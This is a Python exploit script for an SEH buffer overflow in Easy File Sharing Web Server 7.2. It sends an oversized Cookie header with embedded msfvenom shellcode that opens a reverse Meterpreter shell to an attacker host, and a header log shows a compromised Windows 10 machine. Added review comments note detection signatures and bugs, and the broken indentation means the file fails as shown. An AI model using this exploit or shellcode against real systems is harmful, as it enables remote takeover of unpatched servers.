|
#!/usr/bin/python
#Easy File Sharing Web Server 7.2 - SEH Exploit - Tested successfully on Windows 10 x64
#GET 'passWD' Buffer Overflow (SEH)
#pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
#Author: N_A , N_A[at]tutanota.com
#OS Name: Microsoft Windows 10 Home
#OS Version: 10.0.14393 N/A Build 14393
#System Type: x64-based PC
#Vendor: http://www.sharing-file.com
#Greets: clubjk, wetw0rk - dude whut up? Sorry man i need to get down and code some BHP with you like our agreement. Raw sockets() for me :)
#Set me a task you want me to complete bro :)) Speak soon man!
#Note on exploitation: behaviour is erratic; it sometimes only works on the second attempt.
#root@kali:~/exploits# python naefsw.py 192.168.142.1 80
#[*]Connection to: 192.168.142.1 successful!
#[*]Evil buffer sent. G0t sh3ll?
#msf > use exploit/multi/handler
#msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#payload => windows/meterpreter/reverse_tcp
#msf exploit(handler) > set lhost 192.168.142.128
#lhost => 192.168.142.128
#msf exploit(handler) > set lport 443
#lport => 443
#msf exploit(handler) > exploit
#[*] Started reverse TCP handler on 192.168.142.128:443
#[*] Starting the payload handler...
#[*] Sending stage (957999 bytes) to 192.168.142.1
#[*] Meterpreter session 1 opened (192.168.142.128:443 -> 192.168.142.1:57087) at 2017-07-15 07:27:54 +0100
#meterpreter > shell
#Process 9772 created.
#Channel 1 created.
#Microsoft Windows [Version 10.0.14393]
#(c) 2016 Microsoft Corporation. All rights reserved.
#
#C:\Users\NA\Desktop>
import socket, sys
def usage():
    """Print the banner and the expected command-line form to stdout.

    Each entry below already ends in a newline, and print() adds one more,
    so the banner is double-spaced exactly as the original output was.
    """
    rule = "===============================================================================\n"
    banner_lines = [
        rule,
        "\t[*]Easy File Sharing Web Server 7.2 - SEH Exploit[*]\n",
        "\t[*]Spawns a reverse meterpreter shell :>[*]\n",
        "\t[*]By N_A[*]\n",
        "\t[*]Usage: [host] [port][*]\n",
        "\t[*]" + sys.argv[0] + " 192.168.142.128 80[*]\n",
        rule,
    ]
    for text in banner_lines:
        print(text)
# Argument handling. NOTE(review): this guard only rejects a call with no
# arguments at all; sys.argv[2] is read a few lines down, so a call with a
# single argument passes the check and then fails with IndexError.
if len(sys.argv) < 2:
usage()
sys.exit()
vuln = sys.argv[1] #remote host (target address the HTTP request is sent to)
port = sys.argv[2] #port, kept as a string here and converted with int() at connect time
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.128 LPORT=443 -f c -b "\x00"
# Payload bytes as produced by the msfvenom command above, copied verbatim and
# never modified by this script. The LHOST/LPORT given to msfvenom are fixed
# inside these bytes; the host/port arguments above only affect the HTTP
# request and the socket below.
buf = ("\xdb\xc2\xb8\x2d\xb8\x07\x99\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x54\x83\xeb\xfc\x31\x43\x14\x03\x43\x39\x5a\xf2\x65\xa9\x18"
"\xfd\x95\x29\x7d\x77\x70\x18\xbd\xe3\xf0\x0a\x0d\x67\x54\xa6"
"\xe6\x25\x4d\x3d\x8a\xe1\x62\xf6\x21\xd4\x4d\x07\x19\x24\xcf"
"\x8b\x60\x79\x2f\xb2\xaa\x8c\x2e\xf3\xd7\x7d\x62\xac\x9c\xd0"
"\x93\xd9\xe9\xe8\x18\x91\xfc\x68\xfc\x61\xfe\x59\x53\xfa\x59"
"\x7a\x55\x2f\xd2\x33\x4d\x2c\xdf\x8a\xe6\x86\xab\x0c\x2f\xd7"
"\x54\xa2\x0e\xd8\xa6\xba\x57\xde\x58\xc9\xa1\x1d\xe4\xca\x75"
"\x5c\x32\x5e\x6e\xc6\xb1\xf8\x4a\xf7\x16\x9e\x19\xfb\xd3\xd4"
"\x46\x1f\xe5\x39\xfd\x1b\x6e\xbc\xd2\xaa\x34\x9b\xf6\xf7\xef"
"\x82\xaf\x5d\x41\xba\xb0\x3e\x3e\x1e\xba\xd2\x2b\x13\xe1\xba"
"\x98\x1e\x1a\x3a\xb7\x29\x69\x08\x18\x82\xe5\x20\xd1\x0c\xf1"
"\x47\xc8\xe9\x6d\xb6\xf3\x09\xa7\x7c\xa7\x59\xdf\x55\xc8\x31"
"\x1f\x5a\x1d\xaf\x1a\xcc\x5e\x98\xab\x8c\x37\xdb\xb3\x8d\x7c"
"\x52\x55\xdd\xd2\x35\xca\x9d\x82\xf5\xba\x75\xc9\xf9\xe5\x65"
"\xf2\xd3\x8d\x0f\x1d\x8a\xe6\xa7\x84\x97\x7d\x56\x48\x02\xf8"
"\x58\xc2\xa7\xfc\x16\x23\xcd\xee\x4e\x52\x2d\xef\x8e\xff\x2d"
"\x85\x8a\xa9\x7a\x31\x90\x8c\x4d\x9e\x6b\xfb\xcd\xd9\x93\x7a"
"\xe4\x92\xa5\xe8\x48\xcd\xc9\xfc\x48\x0d\x9f\x96\x48\x65\x47"
"\xc3\x1a\x90\x88\xde\x0e\x09\x1c\xe1\x66\xfd\xb7\x89\x84\xd8"
"\xff\x15\x76\x0f\x7c\x51\x88\xcd\xa0\xfa\xe1\x2d\xe4\xfa\xf1"
"\x47\xe4\xaa\x99\x9c\xcb\x45\x6a\x5c\xc6\x0d\xe2\xd7\x86\xfc"
"\x93\xe8\x83\xa1\x0d\xe8\x27\x7a\x5b\x67\xc8\x7d\x64\x89\xf5"
"\xab\x5d\xff\x3e\x68\xda\xf0\x75\xcd\x4b\x9b\x75\x41\x8b\x8e")
seh = "\xeb\x0a\x90\x90" #jump code right here
nseh = "\xF2\x95\x01\x10" #pop pop ret @ 0x100195f2 : pop esi pop ecx ret in ImageLoad.dll
nops = "\x90"
# Cookie value: 57 bytes of filler, the two 4-byte values above, 10 NOP bytes,
# the payload, then 2000 bytes of trailing padding. For detection purposes
# the on-the-wire signature is a UserID=PassWD= cookie value several kB long
# consisting almost entirely of repeated 'A' and 'C' bytes (see the Cookie
# header built below).
evilbuffer = "A" * 57 + seh + nseh + nops * 10 + buf + "C" * 2000
# A single HTTP/1.1 GET for /vfolder.ghp. The oversized data travels in the
# Cookie header, not in the request line or a body, so a request-line length
# limit alone does not see it; a limit on header/cookie length is the
# relevant control.
evil = "GET /vfolder.ghp HTTP/1.1\r\n"
evil += "Host: " + vuln + "\r\n"
evil += "Cookie: SESSIONID=9999; UserID=PassWD=" + evilbuffer + "; frmUserName=; frmUserPass=;\r\n"
evil += "Connection: keep-alive" + "\r\n"
evil += "\r\n\r\n"
# Plain TCP delivery of the request; no response is ever read.
# NOTE(review): the print statements without parentheses below are Python 2
# syntax, so this part of the file is a SyntaxError under Python 3 (where
# s.send() would also require bytes rather than str).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# int(port) raises ValueError for a non-numeric port; that, like any
# connect() failure, ends up in the bare except below. socket.connect()
# returns None, so the 'connect' variable is never meaningful.
connect = s.connect((vuln, int(port)))
print "\n[*]Connection to: " + vuln + " successful!"
# Bare except also swallows KeyboardInterrupt; every failure is reported with
# the same generic message and the underlying error is discarded.
except:
print "[*]Connection Error.Exiting.."
sys.exit(0)
# The "sent" message is printed before send() is called, so it appears even
# if send() itself raises.
print "[*]Evil buffer sent. G0t sh3ll?\n"
s.send(evil)
s.close()
|